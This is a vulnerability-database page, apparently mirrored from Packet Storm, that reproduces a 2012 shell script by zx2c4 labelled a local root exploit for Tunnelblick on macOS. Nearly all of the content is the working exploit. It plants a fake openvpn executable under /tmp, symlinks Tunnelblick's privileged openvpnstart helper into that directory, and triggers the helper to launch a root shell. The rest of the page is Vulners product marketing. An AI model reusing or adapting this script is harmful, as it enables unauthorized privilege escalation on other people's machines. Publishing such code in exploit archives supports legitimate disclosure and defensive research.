Lucene search
K

Tunnel Blick Local Root Exploit Version 2

🗓️ 11 Aug 2012 00:00:00Reported by zx2c4Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Tunnel Blick Local Root Exploit V2

Code
`#!/bin/sh  
  
#### Pwnnel Blicker ####  
# for kids #  
# #  
# zx2c4 #  
# #  
########################  
  
# This is another exploit for Tunnel Blick.  
# Other exploits for Tunnel Blick are available here:  
# http://git.zx2c4.com/Pwnnel-Blicker/tree/  
  
  
  
echo "[+] Making vulnerable directory."  
mkdir -pv /tmp/pwn/openvpn/openvpn-0  
  
echo "[+] Preparing payload."  
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF  
#!/bin/sh  
echo "[+] Cleaning up."  
rm -rfv /tmp/pwn  
echo "[+] Getting root."  
exec bash  
_EOF  
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn  
  
echo "[+] Creating symlink."  
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start  
  
echo "[+] Triggering vulnerable program."  
exec /tmp/pwn/start OpenVPNInfo 0  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Aug 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
23